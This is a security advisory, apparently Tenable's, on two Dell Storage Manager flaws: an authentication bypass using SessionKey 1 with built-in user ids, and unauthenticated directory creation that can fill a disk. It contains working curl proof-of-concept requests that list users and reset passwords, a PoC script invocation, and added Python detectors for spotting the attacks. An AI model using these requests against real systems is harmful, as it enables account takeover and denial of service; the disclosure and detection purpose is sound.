Synopsis
CVE-2025-43995: Authentication Bypass in DSM Data Collector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An unauthenticated remote attacker can access APIs exposed by ApiProxy.war in DataCollectorEar.ear by using a special SessionKey and UserId.
It has been observed that the ApiSession identified by integer key 1 is present in the "sessionHash" regardless of whether any user is currently, or was previously, logged into the application's Web GUI.
Additionally, it appears that there are some special users used in the application. These are masterUser (id 434223), rmsUser (id 434224), and smisUser (id 434225).
By specifying a <SessionKey>1</SessionKey> and <UserId>434223</UserId> in a SOAP message sent to endpoint /CompellentApiServices/CompellentAPIServices, the attacker can access (without authentication) a large set of APIs, including changing an existing DSM user's password.
Proof of Concept
# Get existing users
# - user id identified by InstanceId and user name by InstanceName
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>GetList</Command><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' 'https://<target-host>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Instance(Id|Name)>.*?/Instance(Id|Name)>'
InstanceId>434226</InstanceId>
InstanceName>dsmuser</InstanceName>
# Change password for the user identified by the InstanceId 434226 to "Password123" (without quotes)
# - Modify <InstanceId> and <NewPassword> as needed
# - NOTE:
# --- NewPassword cannot be the same as the old one
# --- NewPassword may need to meet the password min/max length and/or complexity rules
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>ChangePassword</Command><Attributes><InstanceId>434226</InstanceId><NewPassword>Password123</NewPassword></Attributes><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' 'https://<target-host>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Successful>.*/Successful>'
Successful>True</Successful>
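The bypass above is easy to spot on the wire because it always carries SessionKey 1 together with one of the three built-in user ids. The following detector, added here as an example and not part of the advisory or Dell's code, parses a request body posted to /CompellentApiServices/CompellentAPIServices, pulls the compapi document out of the arg0 CDATA, and rates the request; the sample bodies and the "normal" session key are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

API_NS = "{http://WebServer.WebServices.compellent.com/}"
# From the advisory: session key 1 is always present, and these built-in accounts exist.
RESERVED_SESSION_KEY = "1"
RESERVED_USER_IDS = {"434223": "masterUser", "434224": "rmsUser", "434225": "smisUser"}

def extract_compapi(envelope_xml):
    """Return the <compapi> element carried in arg0's CDATA, or None if not present."""
    try:
        root = ET.fromstring(envelope_xml)
        arg0 = root.find(f".//{API_NS}ApiCommand/arg0")
        if arg0 is None or not arg0.text:
            return None
        return ET.fromstring(arg0.text.strip())
    except ET.ParseError:
        return None

def inspect_request(envelope_xml):
    """Classify one body posted to /CompellentApiServices/CompellentAPIServices."""
    compapi = extract_compapi(envelope_xml)
    if compapi is None:
        return {"bypass": False, "severity": "info", "operation": None, "user_name": None}
    conn = compapi.find("ApiConnection")
    session = conn.findtext("SessionKey", "").strip() if conn is not None else ""
    user = conn.findtext("UserId", "").strip() if conn is not None else ""
    operation = f"{compapi.findtext('Object', '?')}.{compapi.findtext('Command', '?')}"
    bypass = session == RESERVED_SESSION_KEY and user in RESERVED_USER_IDS
    if bypass and operation == "EmUser.ChangePassword":
        severity = "critical"  # the advisory's account-takeover case
    elif bypass:
        severity = "high"
    else:
        severity = "info"
    return {"bypass": bypass, "severity": severity, "operation": operation,
            "user_name": RESERVED_USER_IDS.get(user)}

# Constructed sample bodies modelled on the advisory's requests, not captured traffic.
_TEMPLATE = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
             'xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/>'
             '<soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><Object>EmUser</Object>'
             '<CommandType>Method</CommandType><Command>{cmd}</Command><ApiConnection>'
             '<SessionKey>{key}</SessionKey><UserId>{uid}</UserId></ApiConnection></compapi>'
             ']]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>')
SAMPLES = {
    "bypass_list": _TEMPLATE.format(cmd="GetList", key="1", uid="434223"),
    "bypass_passwd": _TEMPLATE.format(cmd="ChangePassword", key="1", uid="434224"),
    "normal": _TEMPLATE.format(cmd="GetList", key="51432", uid="434226"),  # made-up session
}
```

Feed it the decrypted POST bodies from a reverse proxy or WAF in front of port 3033; anything rated high or critical from a host that is not the Data Collector itself is an exploitation attempt.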
CVE-2025-43994: Unauthenticated Large Directory Creation in DSM Server Agent (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
The DSM Server Agent allows an unauthenticated remote attacker to create a directory tree structure with the size specified by the attacker on the host running the agent. This could allow the attacker to fill up a disk drive, potentially leading to DoS.
Proof of Concept
python3 dsm_server_agent_create_space.py -t <target-host> -p 27355 -s 1000
Creating a directory tree of 1000 MB in C:\ on the remote host
Sending:
<em_sa_xml><Command>Create</Command><Arguments><DriveOrMountPoint>C:\</DriveOrMountPoint><FreePercent>0</FreePercent><SizeMB>1000</SizeMB></Arguments><ObjectType>CreateSpace</ObjectType></em_sa_xml>
Received:
<em_sa_xml>
<BaseProcess>
<Index>638868988165592124</Index>
<ProcessName>[Process638868988165592124]CreateSpaceProcess</ProcessName>
<CurrentProgress>0</CurrentProgress>
<TotalProgress>10</TotalProgress>
<CurrentProgress2>0</CurrentProgress2>
<TotalProgress2>0</TotalProgress2>
<State>1</State>
<StateStr>NotStarted</StateStr>
<Message></Message>
<MessageId></MessageId>
<Message2Id></Message2Id>
<MessageParams></MessageParams>
<Message2Params></Message2Params>
</BaseProcess>
</em_sa_xml>
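Because the Server Agent accepts the em_sa_xml command without any authentication, the practical control until the upgrade is to treat any CreateSpace request from a host other than the Data Collector as hostile. The following example is added here and is not the advisory's or Dell's code; the trusted collector address and the source addresses are assumptions, and the sample request and reply are constructed from the exchange shown above.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Assumption for this example: only the DSM Data Collector at this (made-up) address may
# legitimately drive the Server Agent on TCP 27355; substitute your own collector list.
TRUSTED_COLLECTORS = {ipaddress.ip_address("192.0.2.10")}

def parse_agent_request(xml_text):
    """Return (object_type, command, arguments) from an em_sa_xml request, else None."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    if root.tag != "em_sa_xml":
        return None
    args = {el.tag: (el.text or "").strip() for el in root.findall("Arguments/*")}
    return root.findtext("ObjectType", ""), root.findtext("Command", ""), args

def assess_request(src_ip, xml_text):
    """Alert on CreateSpace/Create from any source other than a trusted collector."""
    parsed = parse_agent_request(xml_text)
    if parsed is None:
        return {"alert": False, "reason": "not em_sa_xml"}
    object_type, command, args = parsed
    if (object_type, command) != ("CreateSpace", "Create"):
        return {"alert": False, "reason": f"{object_type}/{command} not in scope"}
    try:
        size_mb = int(args.get("SizeMB", "0"))
    except ValueError:
        size_mb = -1  # a malformed size is itself worth surfacing
    untrusted = ipaddress.ip_address(src_ip) not in TRUSTED_COLLECTORS
    return {"alert": untrusted, "src": src_ip, "size_mb": size_mb,
            "target": args.get("DriveOrMountPoint", "")}

def parse_agent_reply(xml_text):
    """Pull the process index and state out of the agent's BaseProcess reply for correlation."""
    root = ET.fromstring(xml_text)
    proc = root.find("BaseProcess")
    if proc is None:
        return None
    return {"index": proc.findtext("Index", ""), "state": proc.findtext("StateStr", "")}

# Constructed samples: the request mirrors the advisory's PoC; the reply is abbreviated.
SAMPLE_REQUEST = ("<em_sa_xml><Command>Create</Command><Arguments><DriveOrMountPoint>C:\\"
                  "</DriveOrMountPoint><FreePercent>0</FreePercent><SizeMB>1000</SizeMB>"
                  "</Arguments><ObjectType>CreateSpace</ObjectType></em_sa_xml>")
SAMPLE_REPLY = ("<em_sa_xml><BaseProcess><Index>638868988165592124</Index><State>1</State>"
                "<StateStr>NotStarted</StateStr></BaseProcess></em_sa_xml>")
```

The process index returned in the reply is what the agent's own logs will carry, so keeping it alongside the alert lets a responder confirm on the host whether the directory tree was actually created.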
Solution
Upgrade to version 2020 R1.22 or later.
Additional References
https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilities
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]